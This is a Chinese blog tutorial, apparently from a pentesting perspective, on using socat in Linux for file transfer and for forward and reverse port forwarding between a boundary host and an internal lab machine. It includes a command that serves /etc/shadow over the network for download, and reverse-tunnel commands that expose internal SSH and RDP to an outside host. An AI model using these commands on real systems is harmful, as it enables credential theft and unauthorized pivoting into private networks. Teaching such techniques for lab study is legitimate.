首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >linux卸载socat,socat在Linux下的使用「建议收藏」

linux卸载socat,socat在Linux下的使用「建议收藏」

作者头像
全栈程序员站长
发布于 2022-07-25 13:36:08
发布于 2022-07-25 13:36:08
2.1K0
举报

大家好,又见面了,我是你们的朋友全栈君。

目录

0x01 socat介绍

0x02 socat进行文件传输

0x03 socat正向端口转发

0x04 socat反向端口转发

注:

边界机器 Ubuntu 192.168.222.177

内网机器 win7 192.168.222.137

0x01 socat介绍

socat我们在前面也已经介绍过了,之前说的是Windows下的利用,如果没有看到的朋友请移步【socat在Windows下的使用】,socat本身就是在Linux下使用的,非要将它放到Windows下使用难免会有水土不服嘛,这次就回到Linux上来进行socat的使用。

安装的话,我们可以直接下载安装的,如果你非要去手动编译的话,就自行去研究吧。

apt-get install socat

完成后来检验一下是否安装成功

socat -h

0x02 socat进行文件传输

首先,我们去边界机器执行

socat -u /etc/shadow TCP4-LISTEN:55,reuseaddr

然后回到我们本机来下载,这里我本机是Windows的,不过不影响

socat.exe -u TCP4:192.168.222.177:55 OPEN:mima.txt,create

跟之前一样,在哪里执行create的,文件就在哪里

0x03 socat正向端口转发

这里,我们通过边界主机去访问内网的主机

首先我们去边界主机执行命令,将来自外部1000的流量全部都转发到内网机器的3389端口上

socat TCP4-LISTEN:1000,fork TCP4:192.168.222.137:3389

然后我们到本地主机上连接

0x04 socat反向端口转发

首先,我们在本地执行监听

socat.exe tcp-listen:1000 tcp-listen:1001

然后,我们在边缘机器上执行命令

注:10.1.135.96是我本地主机的IP

socat tcp4-connect:10.1.135.96:1000 tcp4:127.0.0.1:22

然后本地连接ssh

当然,直接连接内网的机器也是可以的

socat tcp4-connect:10.1.135.96:1000 tcp4:192.168.222.137:3389

然后回到本地连接远程桌面

注意,整个过程一定要一气呵成,如果中间出错,本地的监听也需要重新执行,否则将会一直报错,如果出现问题,多尝试几次就好

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/127901.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年4月1,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
socat用法收集
将端口8080的数据转发到IP 1.1.1.1 的 8080端口 tcp端口转发时,也支持http的转发。
fensnote
2024/05/09
5000
socat用法收集
Linux端口转发的几种常用方法
在一些实际的场景里,我们需要通过利用一些端口转发工具,比如系统自带的命令行工具或第三方小软件,来绕过网络访问限制触及目标系统。
Bypass
2020/08/27
53K0
socat ,连接不同数据源的中继转发程序
socat(socket cat)是一个基于命令行的实用程序,它建立两个双向字节流并在它们之间传输数据。
YaoQi
2025/07/14
1350
socat ,连接不同数据源的中继转发程序
推荐一个网络工具-socat
下载地址:http://www.dest-unreach.org/socat/download/
fensnote
2024/04/30
4710
推荐一个网络工具-socat
Ubuntu使用socat进行端口转发
以前写过一篇使用iptables进行端口转发的文章, 今天写一下使用socat将本地端口的流量转发到远程机上的过程. 不要问我这样做有什么用, 我也不知道.
用户8851537
2021/07/22
3.8K0
使用socat进行单个端口的转发,同时支持tcp和udp
说明:由于用iptables经常不成功。所以只能寻求另一种办法,就是用socat工具来完成端口转发,如果你只有少数几个端口要转发的话,那么socat就是比较好的选择了。socat唯一麻烦的地方就是好像我没找到如何转发端口段,只能一个命令一个端口。不过如果只是自用转发少量端口的话还是蛮好用的。
用户8851537
2021/07/23
14.3K2
记一次MSF综合应用内网渗透记录
Date/time:2013年,很久没写技术文章了,记得之前写过MSF的reverse、bind两种反弹方式在实战中的应用,这次来写一篇MSF综合应用到内网渗透的实战文章。
潇湘信安
2022/01/21
1.5K0
记一次MSF综合应用内网渗透记录
渗透测试中几只“猫”的用法
渗透测试过程中会用到一些系统shell工具,有几只长得很像,分别是netcat(nc), nmap-cat(ncat), socat, powercat. 都是跟“猫”相关的,这几只“猫”上得了庭堂,下得了厨房,不对,是上可卖萌,下可贩贱,最近汇总了下这几只“猫”的用法,分享如下。
Power7089
2020/11/09
1.2K0
渗透测试中几只“猫”的用法
内网隧道搭建总结(一)
该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。
乌鸦安全
2021/10/26
2.2K0
内网隧道搭建总结(一)
socat netcat nc 网络工具/黑客工具「建议收藏」
socat 2016/05/11 Chenxin整理 socat简介 黑客小工具—socat socat 被称为是NC的plus,plus版,号称NC的最强的衍生版本。socat是一款双向数据流通道工具。具有许多强大的功能:端口的连接、端口侦听、收发文件、传递shell、端口转发、端口扫描等 官方网站:socat
全栈程序员站长
2022/08/01
1.7K0
浅谈内网端口转发
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。最常见的端口转发工具不限于以下几款,大家可以根据在实际测试过程的需要进行选择。
FB客服
2019/08/21
2.5K0
SSRF详细利用方式及getshell
在存在ssrf处访问http://10.1.1.200(本机服务地址) 查看kali机器服务器日志信息:
黑白天安全
2020/03/19
8K1
CobaltStrike使用:第一篇(基本使用方法、监听器、重定向器)
Cobalt Strike使用C/S架构,Cobalt Strike的客户端连接到团队服务器,团队服务器连接到目标,也就是说Cobalt Strike的客户端不与目标服务器进行交互
FB客服
2021/12/15
4.8K0
CobaltStrike使用:第一篇(基本使用方法、监听器、重定向器)
Cobaltstrike 学习笔记(四)重定向器IP防溯源
重定向器是位于你的目标网络和你的团队服务器之间的系统。任何去往重定向器的连接将转发到你的团队服务器进行处理。通过重定向器,可以为你的 Beacon payload 提供多个回连主机。使用重定向器有助于提升行为安全,因为它会使溯源团队服务器的真实地址变得更加困难。
LuckySec
2022/11/02
6120
Cobaltstrike 学习笔记(四)重定向器IP防溯源
CS学习笔记 | 22、通过SSH开通通道
2. 在红色区域的 PIVOT 主机上开启通过 SSH Socks 的 445 端口转发
TeamsSix
2020/09/18
7520
CS学习笔记 | 5、如何建立Payload处理器
这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人。
TeamsSix
2020/05/09
1.1K0
socat介绍「建议收藏」
socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的 通道。socat的地址類型很 多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,等等。看一個例子:
全栈程序员站长
2022/07/23
1.1K0
socat 使用「建议收藏」
用socat试几个netcat常用的用法,对比如下: 1. 听tcp 12345端口 # nc -l 127.0.0.1 12345 # socat tcp-listen:12345 – 2. 向远处tcp 12345端口发点字 # echo “test” | nc 127.0.0.1 12345 # echo “test” | socat – tcp-connect:127.0.0.1:12345 3. 听udp 23456端口 # nc -u -l 127.0.0.1 23456 # socat udp-listen:23456 – 4. 向远处udp 23456端口发点字 # echo “test” | nc -u 127.0.0.1 23456 # echo “test” | socat – udp-connect:127.0.0.1:23456 5. 听unix socket /tmp/unix.socket # nc -U -l /tmp/unix.socket netcat没有-U选项 # socat unix-listen:/tmp/unix.socket – 6. 向本地unix socket /tmp/unix.socket发点字 # echo “test” | nc -U /tmp/unix.socket netcat没有-U选项 # echo “test” | socat – unix-connect:/tmp/unix.sock 7. 听本地unix datagram socket /tmp/unix.dg.sock nc110搞不定,netcat也搞不定 # socat unix-recvfrom:/tmp/unix.dg.sock – 8. 向本地unix datagram socket /dev/log发点字 nc110搞不定,netcat也搞不定 # echo “test” | socat – unix-sendto:/tmp/unix.dg.sock
全栈程序员站长
2022/07/23
1.6K0
内网渗透基石篇-- 隐藏通信隧道技术(上)
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
顾翔
2021/05/17
2.6K0
内网渗透基石篇-- 隐藏通信隧道技术(上)
记一次获取远程桌面历程
整体流程: 第一步,万能密码进入后台 第二步,传免杀马连菜刀 第三步,端口转发 第四步,读取hash值
HACK学习
2019/08/06
6740
记一次获取远程桌面历程
相关推荐
socat用法收集
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档